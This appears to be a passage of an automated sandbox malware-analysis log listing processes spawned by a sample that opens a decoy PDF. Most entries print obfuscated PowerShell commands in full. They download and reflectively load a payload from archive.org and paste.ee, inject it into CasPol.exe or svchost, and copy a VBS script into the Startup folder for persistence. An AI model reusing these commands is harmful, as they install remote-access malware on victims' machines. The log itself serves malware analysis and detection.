Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" |
|
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe "cmd" /C start C:\Users\Public\Documents\privacy_policy.pdf |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\sys\pure_hnvc.bat"" |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\sys\pure_hnvc.bat"" |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\sys\pure_hnvc.bat"" |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe "cmd" /C echo %username% |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\pow\wm_startup.bat"" |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\pow\wm_startup.bat"" |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\pow\wm_startup.bat"" |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe "cmd" /C echo %username% |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\32\pure_hnvc.bat"" |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\32\pure_hnvc.bat"" |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\32\pure_hnvc.bat"" |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe "cmd" /C echo %username% |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Documents\privacy_policy.pdf" |
Jump to behavior |
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 |
Jump to behavior |
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1724,i,13391688068409325489,10583059356098987935,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 |
Jump to behavior |
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Jump to behavior |
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs" |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\wscript.exe |
